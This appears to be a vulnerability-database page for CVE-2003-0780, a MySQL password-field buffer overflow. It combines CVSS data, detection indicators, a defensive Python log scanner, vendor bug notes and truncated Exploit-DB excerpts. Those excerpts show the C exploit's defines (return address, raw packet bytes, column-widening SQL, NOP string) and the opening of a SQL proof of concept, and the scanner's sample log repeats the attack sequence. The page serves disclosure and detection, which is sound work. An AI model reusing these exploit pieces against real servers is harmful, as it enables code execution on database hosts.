CVE-2003-0780
Published 2003-09-22
Priority P3 · 53 · critical · CVSS 2.0 score 9
CVSS 2.0 vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
Exploit available · EPSS 74.58% (99.4th percentile)
Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.
Affected
65 affected version ranges (version and fix details not given):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| conectiva | linux | — | — |
| mysql | mysql | — | — |
| oracle | mysql | — | — |
Detection & IOCs (extracted from sources)
- bytes: `\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73` (the raw FLUSH PRIVILEGES packet sent by the public exploit)
- Exploitation requires ALTER TABLE privileges on the mysql.user table; monitor for ALTER TABLE statements changing the Password column type to LONGTEXT on the mysql.user table.
- The exploit triggers the buffer overflow via an oversized Password field (more than 16 characters) followed by FLUSH PRIVILEGES; monitor for UPDATE statements on mysql.user that set Password to strings far exceeding 16 characters.
- The exploit connects to MySQL on TCP port 3306 and sends a raw FLUSH PRIVILEGES packet with the byte sequence \x11\x00\x00\x00\x03 followed by 'flush privileges'; detect this raw packet pattern on port 3306.
- The exploit uses a fixed JMP *EAX return address 0x42125b2b targeting glibc-2.2.93-5; presence of this address in network traffic to port 3306 is a strong indicator of exploitation.
- The exploit uses a PAD value of 19*4*2 (152 bytes) to align the overflow buffer; oversized password payloads of this structure sent to MySQL should be flagged.
- The vulnerable function is get_salt_from_password in sql_acl.cc; stack traces or crash dumps referencing this function indicate exploitation attempts.
- Exploitation requires the attacker to already possess global ALTER TABLE privileges on the MySQL server (i.e., administrative access); this is not an unauthenticated remote exploit.
- The proof-of-concept exploit targets glibc-2.2.93-5 with a hardcoded return address (0x42125b2b); exploitation against other glibc versions would require a different return address.
- Affected versions are MySQL 4.0.14 and earlier, and all 3.23.x releases; systems running later versions are not affected by this specific CVE.
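As an added, defender-side example (not part of this record or of any source it aggregates): a small Python scanner that applies the ALTER TABLE, oversized-Password and FLUSH PRIVILEGES indicators above to MySQL general-log lines, correlating them per connection so that a FLUSH PRIVILEGES is only flagged after the same connection staged an oversized Password. The log line shape and the sample lines are constructed assumptions, and the ALTER check generalizes beyond LONGTEXT to any TEXT or BLOB widening of the column.

```python
import re
from collections import defaultdict
PASSWORD_MAX = 16  # MySQL <= 4.0 stores a 16-char scrambled hash; the overflowed buffer is sized for it
# Assumed general-log line shape (constructed for this example): "<date> <time> <thread_id> Query <sql>"
LOG_RE = re.compile(r"^\S+\s+\S+\s+(\d+)\s+Query\s+(.*)$")
ALTER_RE = re.compile(  # Password column on mysql.user widened to any TEXT/BLOB type
    r"ALTER\s+TABLE\s+(?:`?mysql`?\.)?`?user`?\b.*\bPassword\b.*\b\w*(?:TEXT|BLOB)\b", re.IGNORECASE)
UPDATE_RE = re.compile(  # literal Password value written to mysql.user (PASSWORD(...) calls do not match)
    r"UPDATE\s+(?:`?mysql`?\.)?`?user`?\b.*\bPassword\s*=\s*'([^']*)'", re.IGNORECASE)
FLUSH_RE = re.compile(r"FLUSH\s+PRIVILEGES", re.IGNORECASE)

def classify(sql):
    """Map one statement to the IOC stage it matches, or None."""
    if ALTER_RE.search(sql):
        return "alter_password_column"
    m = UPDATE_RE.search(sql)
    if m and len(m.group(1)) > PASSWORD_MAX:
        return "oversized_password"
    if FLUSH_RE.search(sql):
        return "flush_privileges"
    return None

def scan_log(text):
    """Return (line_no, thread_id, stage, severity) tuples. FLUSH PRIVILEGES is only reported
    when the same connection already wrote an oversized Password: that reload feeds the value to get_salt_from_password."""
    staged, findings = defaultdict(set), []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        tid, sql = m.groups()
        stage = classify(sql)
        if stage == "flush_privileges":
            if "oversized_password" in staged[tid]:
                findings.append((n, tid, stage, "high"))
        elif stage:
            staged[tid].add(stage)
            findings.append((n, tid, stage, "high" if stage == "oversized_password" else "medium"))
    return findings

# Constructed sample log: connection 3 runs the full sequence; connection 4 does a
# legitimate PASSWORD() update followed by FLUSH PRIVILEGES and must not be flagged.
SAMPLE_LOG = """\
030914 12:00:01       3 Query     USE mysql
030914 12:00:02       3 Query     ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT
030914 12:00:03       3 Query     UPDATE user SET Password='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' WHERE User='bob'
030914 12:00:04       3 Query     FLUSH PRIVILEGES
030914 12:00:05       4 Query     UPDATE mysql.user SET Password=PASSWORD('s3cret') WHERE User='alice'
030914 12:00:06       4 Query     FLUSH PRIVILEGES
"""
```

Running `scan_log(SAMPLE_LOG)` yields three findings, all for connection 3; the PASSWORD() update on connection 4 is ignored because it writes a hashed value, not an oversized literal.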
CVSS provenance
- NVD (CVSS 2.0): 9.0 CRITICAL, AV:N/AC:L/Au:S/C:C/I:C/A:C
- Red Hat (vendor): 9.0 CRITICAL
Red Hat · vendor advisory · 2003-09-10 · CVSS 9.0
CVE-2003-0780 [CRITICAL] security flaw
GHSA · ghsa_unreviewed · 2022-04-29
CVE-2003-0780 [HIGH] GHSA-fq6h-5jh8-rmxv: Buffer overflow in get_salt_from_password from sql_acl
No detection rules found.
Exploit-DB · 2003-09-14
CVE-2003-0780 MySQL 3.23.x/4.0.x - Remote Buffer Overflow
---
```c
/* Mysql 3.23.x/4.0.x remote exploit
 * proof of concept
 * using jmp *eax
 * bkbll (bkbll cnhonker.net,bkbll tom.com) 2003/09/12
 * compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
 * DO NOT DISTRUBITED IT
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PAD 19*4*2
#define JMPADDR 0x42125b2b
#define ROOTUSER "root"
#define PORT 3306
#define MYDB "mysql"
#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"
#define LISTUSERSQL "SELECT user FROM mysql.user WHERE user!='root' OR user='root LIMIT 1,1'"
#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"
#define BUF 1024
MYSQL *conn;
char NOP[]="90";
/*
char shellcode
```
Exploit-DB · 2003-09-10
CVE-2003-0780 MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow
---
source: https://www.securityfocus.com/bid/8590/info
MySQL server has been reported to be prone to a buffer overflow when handling user passwords of excessive size.
The issue is caused by insufficient bounds checking when processing MySQL user passwords. A password longer than 16 characters may overrun a fixed-size buffer in memory and corrupt adjacent memory. An attacker with global administrative privileges on an affected MySQL server may exploit this condition to have arbitrary supplied instructions executed in the context of the MySQL server process.
```sql
USE mysql;
ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
UPDATE User SET Password = '1234567812345678123
```
Bugzilla · 2018-08-16 · CVSS 9.0
CVE-2003-0780 [CRITICAL] CVE-2003-0780 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.
Bugzilla · 2003-09-16
[MEDIUM] CAN-2003-0780 MySQL password field buffer overflow
Frank Denis reported a bug in unpatched versions of MySQL versions prior to 3.0.58. Passwords of MySQL users are stored in the Password field of the user table, part of the mysql database. By filling a Password field with a value wider than 16 characters, a buffer overflow can occur. This could allow an attacker who has the ability to modify the user table to execute arbitrary code as the MySQL user. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0780 to this issue.
Discussion:
We will address this by moving to MySQL 3.23.58 (released yesterday).
---
RHSA-2003:282 in progress
---
An errata has been issued which should help the problem described in this bug report.
This report is there
References
- http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000743
- http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/009819.html
- http://marc.info/?l=bugtraq&m=106364207129993&w=2
- http://marc.info/?l=bugtraq&m=106381424420775&w=2
- http://secunia.com/advisories/9709
- http://www.debian.org/security/2003/dsa-381
- http://www.kb.cert.org/vuls/id/516492
- http://www.mandriva.com/security/advisories?name=MDKSA-2003:094
- http://www.redhat.com/support/errata/RHSA-2003-281.html
- http://www.redhat.com/support/errata/RHSA-2003-282.html
- http://www.securityfocus.com/archive/1/337012